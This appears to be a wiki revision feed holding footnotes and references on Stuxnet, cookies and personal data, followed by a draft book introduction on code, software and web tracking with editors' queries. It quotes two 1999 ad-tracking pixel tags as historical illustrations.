Markoff, J. and Sanger, D. S. (2010) In a Computer Worm, a Possible Biblical Clue, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) The Importance of Philosophy to Engineering, ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web, Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) The Stuxnet Sting, accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) Langner’s Stuxnet Deep Dive S4 Video, accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) Search Engine Use 2012, accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) So What Do We Do With All This Data?, _The Smithsonian_, accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) Feel. Act. Make sense, accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) Bad Habits? My Future Self Will Deal With That, accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) Tracking Protection Working Group, accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) The Personal Analytics of My Life, accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth, ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies and Locally Stored Objects (LSOs) and document object model storage (DOM Storage) &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: “Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity” (Ghostery 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of a virus. Indeed, worms spread from computer to computer, often across networks, but unlike a virus, a worm has the ability to transfer itself without requiring any human action. A worm is able to do this by taking advantage of the file or information transport features, such as the networking setup, on a computer, which it exploits to enable it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm and the careful analysis of the interal data structures and finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner with photographs that has been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad, and confirmed the importance of the cascade structure, centrifuge layout and the enriching process by careful analysis of the accidental photographing of background images on computers used by the president see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was on 03/02/2010 (Matrosov et al., n.d.). Although there is suspicion that there may be three versions of the Stuxnet code in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] Although there are some criticisms that this link may be spurious, for instance Cryptome (2010) argues: It may be that the &amp;quot;myrtus&amp;quot; string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;as in Remote Terminal Unit. &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Computational actants, drawing the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4700</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4700"/>
		<updated>2012-04-18T13:48:29Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology that we inhabit. As such we need to take account of this new computational envornment and think about how today we live in a highly mediated, code-based world. [Eds: Is there a slippage here from a situation where code and software are 'important', to one in which they form the actual basis of our world, constituting the possibility of human life? Does something need to be said here about the extent to which code and software can be privileged in this respect? For example, why can they be said to constitute the conditions for human living over and above any of the other possible candidates for this role: air, the economy, evolution, the environment, satellites and so on?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which it also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has inevitably [Eds: is its penetration really 'inevitable'?] penetrated more and more into the lifeworld. This has created, and continues to create, specific tensions in relation to old media forms [Eds: should an example be provided of such a tension?], as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. This [Eds: this is the fourth sentence in this paragraph to begin with 'This'] is a result of the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. [Eds: should some examples of such statistics be provided?] These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it. &lt;br /&gt;
&lt;br /&gt;
They [Eds: what does this 'they' refer to? Can it be clarified?] also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life is simply breathtaking [Eds: is this not repeating the 'breathtaking' claim of the previous paragraph?], if we had not already discounted and backgrounded its importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane. &lt;br /&gt;
&lt;br /&gt;
Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences [Eds: Above the claim was made that code/software are the conditions of possibility of human life. How, then, can they mediate between us and our experiences if they are what makes 'us' possible? Do they constitute us and our world; do they mediate between us and the world; or do they do both? Does all this need clarifying?], disconnecting the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system. Called ‘fly-by-wire’ in aircraft design, in reality fly-by-wire is the condition of the computational environment we increasingly experience, and I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacra lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. [Eds: less material than what? Does this need to be explained?] This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangular squares which yield only to certain prescribed forms of touch-based interfaces. Here I am thinking both of physical keyboards and trackpads, as much as haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. [Eds: At least one of those contained in your book here, F. Frabetti, creates problems for this idea of Hayles' and its too simplistic understanding of code, print, and materiality. Is this something that should be referenced and commented upon?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomena of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, but also [Eds: use 'and' instead of 'but also' as these acts are not that different?] send various information about the user back to their servers. &lt;br /&gt;
&lt;br /&gt;
Originally designed as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘State’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour, and collect data and information about users raises important privacy implications, but it also facilitates the rise of so-called behaviour marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245). &lt;br /&gt;
&lt;br /&gt;
Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company] it is described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code run in the browser without the knowledge of the user, which if it should be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999): &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any) &amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;group=register&amp;amp;amp; time=1999.10.27.20.5 6.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique to reduce the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)', the data is not shared with third parties but no information is given on their data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012). [Eds: please check that the single and double quotation marks here are correct]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second guess, tempt, direct and nudge behavior in particular directions. Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen in terms of relative size of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor to each website at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) is generating $189 per user, at [http://www.businessinsider.com/blackboard/google Google] (search) it is generating $24 per user, and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011).&amp;amp;nbsp; Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is increasingly becomong extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into five main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers. (web site operators) Example: [http://www.burstmedia.com/ Burst Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld]&amp;lt;br&amp;gt; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2010)]] &amp;lt;br&amp;gt; ''Image 1: Display Advertising Technology Landscape (Luma, 2010)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
